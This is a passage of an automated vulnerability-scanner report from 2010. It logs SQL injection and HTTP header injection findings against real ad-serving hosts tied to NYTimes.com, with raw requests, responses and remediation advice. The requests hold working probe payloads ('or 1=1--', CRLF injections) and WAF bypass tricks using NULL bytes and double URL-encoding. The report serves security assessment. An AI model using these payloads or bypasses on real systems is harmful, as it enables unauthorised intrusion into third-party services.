User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5739.NYTimes.com/B4990972.8

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 71268400%20or%201%3d1--%20 and 71268400%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d1--%20=1 HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Flash40.swf";
var gif = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Static.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d2--%20=1 HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130399999999999003BAN007"><img src="http://s0.2mdn.net/viewad/2215498/BAN_TorchBrowser_728x90_FY11_Q3_Static.jpg" border=0 alt="Click here to find out more!"></a>');

1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5739.NYTimes.com/B4990972.8

Issue detail

The opzn&page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the opzn&page parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel'&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel''&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5739.NYTimes.com/B4990972.8

Issue detail

The pos parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pos parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00'&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00''&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adscgen/sta.php%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0
Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:49:02 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1410


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
</a>
about the error.


</dd>
...[SNIP]...

Request 2

GET /adscgen/sta.php%2527%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0
Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:49:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 308
Keep-Alive: timeout=120, max=267
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/sta.php%27%27 was not found on this server.<
...[SNIP]...

2. HTTP header injection

There are 82 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://50.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3ad15%0d%0a1c8f5fba2b9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&3ad15%0d%0a1c8f5fba2b9=1 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 01:48:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=2fb24f52-9cc4-a448-bb6f-0000476b34c3; expires=Fri, 11-Feb-2011 01:48:15 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx?3ad15
1c8f5fba2b9
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://50.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://50.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload add4a%0d%0ac9c4539c3b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspxadd4a%0d%0ac9c4539c3b6 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 01:48:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=69a583c2-bc54-63e9-bbde-000069f3421b; expires=Fri, 11-Feb-2011 01:48:12 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspxadd4a
c9c4539c3b6

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fbfaf%0d%0a92218480552 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0fbfaf%0d%0a92218480552; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0fbfaf
92218480552
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Connection: close


2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the Pos request parameter is copied into the Set-Cookie response header. The payload ff8ba%0d%0a362c533d84b was submitted in the Pos parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922996&Page=&PluID=0&Pos=ff8ba%0d%0a362c533d84b HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 13 Nov 2010 01:59:50 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHH0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
